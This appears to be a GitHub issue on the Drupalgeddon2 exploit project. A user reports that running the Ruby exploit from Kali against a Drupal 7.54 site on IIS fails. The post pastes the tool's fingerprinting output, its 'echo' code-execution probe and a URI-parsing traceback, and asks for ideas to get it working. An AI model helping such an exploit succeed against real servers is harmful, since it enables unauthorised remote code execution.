-
Notifications
You must be signed in to change notification settings - Fork 178
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Drupal v7.54 #65
Comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi,
#attack machine
kali 2020_03 full updated
#target
OS: Windows
webserver: IIS8.5
Drupal v7.54
https://www.local.com/CHANGELOG.txt
Tried with the 'try_phpshell = true' and 'try_phpshell = false' not runing.
Any ideas i could try?
############
[root:/opt/Drupalgeddon2]# ruby drupalgeddon2.rb https://www.local.com/ (master)
[*] --==[::#Drupalggedon2::]==--
[i] Target : https://www.local.com/
[+] Found : https://www.local.com/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
[*] Testing: Form (user/password)
[+] Result : Form valid
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
[*] Testing: Code Execution (Method: name)
[i] Payload: echo EOLRQNNO
Traceback (most recent call last):
7: from drupalgeddon2.rb:463:in
<main>' 6: from drupalgeddon2.rb:463:in
each'5: from drupalgeddon2.rb:473:in
block in <main>' 4: from drupalgeddon2.rb:44:in
http_request'3: from /usr/lib/ruby/2.7.0/uri/common.rb:737:in
URI' 2: from /usr/lib/ruby/2.7.0/uri/common.rb:234:in
parse'1: from /usr/lib/ruby/2.7.0/uri/rfc3986_parser.rb:73:in
parse' /usr/lib/ruby/2.7.0/uri/rfc3986_parser.rb:21:in
split': URI must be ascii only "https://www.local.com/?q=file/ajax/name/%23value/form-2sKgFeXBW8q3Ukw1XT7U6wHkN_RxDjP0zcrXhWGxt68\\" /><input type=\"hidden\" name=\"form_id\" value=\"search_block_form\" /><div style=\"clear:both\"><div class=\"block-sep\"><div id=\"navigation\" role=\"navigation\" class=\"clearfix\"><div class=\"constrain\"><div id=\"nav-left\"><div id=\"nav-right\"><ul id=\"navmenu\" class=\"sf-menu sf-js-enabled sf-shadow\">The text was updated successfully, but these errors were encountered: